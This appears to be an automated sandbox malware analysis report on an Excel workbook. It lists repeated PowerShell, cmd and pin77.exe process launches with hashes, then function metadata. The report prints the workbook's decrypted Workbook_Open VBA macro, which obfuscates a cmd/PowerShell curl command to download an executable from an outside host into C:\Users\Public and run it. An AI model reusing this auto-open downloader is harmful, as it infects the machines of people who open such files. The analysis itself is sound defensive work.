| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 58 |
| Start time: | 12:08:21 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 61 |
| Start time: | 12:08:41 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 62 |
| Start time: | 12:08:42 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 63 |
| Start time: | 12:08:42 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 64 |
| Start time: | 12:08:47 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 65 |
| Start time: | 12:09:07 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 66 |
| Start time: | 12:09:08 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff651c80000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 67 |
| Start time: | 12:09:08 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 68 |
| Start time: | 12:09:17 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 69 |
| Start time: | 12:09:35 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 70 |
| Start time: | 12:09:35 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 71 |
| Start time: | 12:09:36 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 72 |
| Start time: | 12:09:40 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 73 |
| Start time: | 12:10:04 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 74 |
| Start time: | 12:10:04 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 75 |
| Start time: | 12:10:07 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 76 |
| Start time: | 12:10:12 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 77 |
| Start time: | 12:10:34 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 78 |
| Start time: | 12:10:34 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 79 |
| Start time: | 12:10:34 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 80 |
| Start time: | 12:10:40 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 83 |
| Start time: | 12:11:05 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 84 |
| Start time: | 12:11:05 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 85 |
| Start time: | 12:11:06 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 86 |
| Start time: | 12:11:12 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 90 |
| Start time: | 12:11:41 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 91 |
| Start time: | 12:11:41 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 92 |
| Start time: | 12:11:42 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 93 |
| Start time: | 12:11:49 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 94 |
| Start time: | 12:12:16 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 95 |
| Start time: | 12:12:16 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 96 |
| Start time: | 12:12:17 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 97 |
| Start time: | 12:12:24 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 98 |
| Start time: | 12:12:53 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 99 |
| Start time: | 12:12:53 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 100 |
| Start time: | 12:12:54 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 101 |
| Start time: | 12:13:00 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 102 |
| Start time: | 12:13:30 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 103 |
| Start time: | 12:13:30 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 104 |
| Start time: | 12:13:31 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 105 |
| Start time: | 12:13:35 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 107 |
| Start time: | 12:14:06 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 108 |
| Start time: | 12:14:07 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 109 |
| Start time: | 12:14:07 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
Call Graph
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Sheet1
Declaration
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Sheet1" |
| 2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = True |
Module: ThisWorkbook
Declaration
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "ThisWorkbook" |
| 2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = True |
| APIs | Meta Information |
|---|---|
Replace | Replace( |
GetObject | GetObject( |
CLng | |
CInt | |
Replace | Replace( |
exec | IWshShell3.exec( |
| Strings | Decrypted Strings |
|---|---|
| "pushresponse" | |
| "naakslook8i" | |
| "2" | |
| ":7pushresponseC" | |
| "pushresponse" | |
| "new" | |
| "C:\Users\Pub" | |
| "cmd /c pow^tradedesignrs^htradedesignll/W 01 c^u^rl htt^ps://thtradedesign.tradedesignarth.li/~sgtatham/putty/lattradedesignst/w32/putty.tradedesign^xtradedesign -o " | |
| "e" | |
| "tradedesign" |
| Line | Instruction | Meta Information |
|---|---|---|
| 9 | Private Sub Workbook_Open() | |
| 10 | tradedesign = "pushresponse" | executed |
| 11 | h7asda = "naakslook8i" | |
| 12 | interestregion = Replace(":7pushresponseC" & tradedesign & "4D", "pushresponse", "2") | Replace( |
| 13 | Set understandremember = GetObject("new" & interestregion & "D5-D70A-438B-8A42-984" & CLng("1.8") & "4B88AFB" & CInt("8.1")) | GetObject( CLng CInt executed |
| 14 | tradedesign = "C:\Users\Pub" | |
| 15 | humantonight = tradedesign & "lic\pin77.exe" | |
| 16 | go8d7sa6 = Replace("cmd /c pow^tradedesignrs^htradedesignll/W 01 c^u^rl htt^ps://thtradedesign.tradedesignarth.li/~sgtatham/putty/lattradedesignst/w32/putty.tradedesign^xtradedesign -o " & humantonight & ";" & humantonight, "tradedesign", "e") | Replace( |
| 17 | understandremember.exec go8d7sa6 | IWshShell3.exec( |
| 18 | End Sub |
Execution Graph
| Execution Coverage: | 0.7% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 10.9% |
| Total number of Nodes: | 311 |
| Total number of Limit Nodes: | 24 |
Graph
Function 002F46E0 Relevance: 45.6, APIs: 11, Strings: 15, Instructions: 102libraryloaderwindowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003569E0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94libraryloaderCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0038E51E Relevance: 1.5, APIs: 1, Instructions: 3COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00324B50 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 372libraryloadernetworkCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0030D790 Relevance: 65.4, APIs: 28, Strings: 9, Instructions: 605windowtimeCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00337FA0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88windowregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0030F780 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0030F180 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003131A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84windowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003142C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0030D550 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003130F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70windowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003A3777 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003A5BD4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003A4971 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0032B850 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00348B40 Relevance: 204.8, APIs: 7, Strings: 108, Instructions: 3561COMMON
Download Yara Rule
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00345060 Relevance: 189.7, APIs: 2, Strings: 105, Instructions: 2486COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 002F4877 Relevance: 131.9, APIs: 52, Strings: 23, Instructions: 698windowtimeCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 002F7430 Relevance: 77.9, APIs: 28, Strings: 16, Instructions: 851clipboardmemorywindowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00310660 Relevance: 54.1, APIs: 12, Strings: 18, Instructions: 1584COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00326250 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 267networkCOMMON
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0030E0F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 262windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0032C480 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118memoryCOMMON
Download Yara Rule
